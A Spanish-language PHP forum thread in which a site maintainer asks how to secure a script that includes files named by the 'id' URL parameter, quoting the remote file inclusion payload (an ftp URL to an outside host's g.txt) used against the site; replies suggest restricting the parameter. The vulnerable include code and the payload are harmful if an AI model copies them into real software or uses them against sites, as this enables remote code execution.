Foros del Web » Programando para Internet » PHP »

Filtrar codigo PHP para mayor seguridad, o sustuir po un metodo similar

Estas en el tema de Filtrar codigo PHP para mayor seguridad, o sustuir po un metodo similar en el foro de PHP en Foros del Web. Hola.. como estan, me han pasado una pagina Web para mantenerla, pero en estas lineas de script me han detectado una inyeccion de codigo: @import ...
  #1 (permalink)  
Antiguo 15/09/2010, 15:05
Avatar de loncho_rojas
Colaborador
 
Fecha de Ingreso: octubre-2008
Ubicación: En el mejor lugar del mundo
Mensajes: 2.704
Antigüedad: 16 años, 2 meses
Puntos: 175
Filtrar codigo PHP para mayor seguridad, o sustuir po un metodo similar

Hola.. como estan, me han pasado una pagina Web para mantenerla, pero en estas lineas de script me han detectado una inyeccion de codigo:

Código PHP:
Ver original
  1. <?php
  2.  
  3.     if(!isset($_GET['id']))
  4.     {
  5.     include("inicio.php");
  6.     } else {
  7.     if(file_exists($_GET['id'].".php"))
  8.     {
  9.         include($_GET['id'].".php");
  10.     } else {
  11.         include("error.php");
  12.     }
  13.     }
  14.    
  15.  
  16. ?>

esto actua como un Frame que llama a otras paginas, y si no existe, tira la pagina de error

Como podría actualizar este código? o como podria generar un filtro para que no me inyecten un código..

(lo que me estan inyectando es esto: favor no abrirlo, no es un virus, solo como ejemplo)

index.php? id=ftp:// lucronarede. t5.com. br:864798@
lucronarede.t5.com. br/g.txt?

Lo separo todo para que no lo tome como LINK... quiero evitar que sigan entrando desde aqui.. necesito un cable por favor..

Gracias
__________________
Ayudo con lo que puedo en el foro, y solo en el foro.. NO MENSAJES PRIVADOS.. NO EMAILS NI SKYPE u OTROS.

Antes de hacer un TOPICO piensa si puedes hallarlo en Google o en el Buscador del Foro...
  #2 (permalink)  
Antiguo 15/09/2010, 15:12
Colaborador
 
Fecha de Ingreso: octubre-2009
Ubicación: Tokyo - Japan !
Mensajes: 3.867
Antigüedad: 15 años, 2 meses
Puntos: 334
Respuesta: Filtrar codigo PHP para mayor seguridad, o sustuir po un metodo similar

es pesima idea dejar que las personas tengan acceso directo a un include..
si no sabes los nombres de los botones.. (link dinamicos) podrias usar mod rewrite para controlar eso
o alguna regex que solo te permita letras dentro de ?id=
saludos!
__________________
More about me...
~ @rhyudek1
~ Github
  #3 (permalink)  
Antiguo 15/09/2010, 18:38
Avatar de silvanha  
Fecha de Ingreso: marzo-2006
Ubicación: En mi mundo de sueños
Mensajes: 653
Antigüedad: 18 años, 9 meses
Puntos: 65
Respuesta: Filtrar codigo PHP para mayor seguridad, o sustuir po un metodo similar

eso significa que de acuerdo al id, tienes tantos archivos como id's

1.php, 2.php, 3.php..

otra opción además de lo que te comento Hidek, es crear un solo archivo, me imagino que esos archivos tienen algo en común, no olvides, el dinamismo que te ofrecen las páginas PHP.. y luego llamar solo a el.. digo no tiene mucho sentido lo que estas haciendo :P

saluditos ^^
__________________
●•· No hay nada imposible..
●•· Vico-X.. ;)

Etiquetas: filtrar, mayor, metodo, seguridad, similar
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 04:50.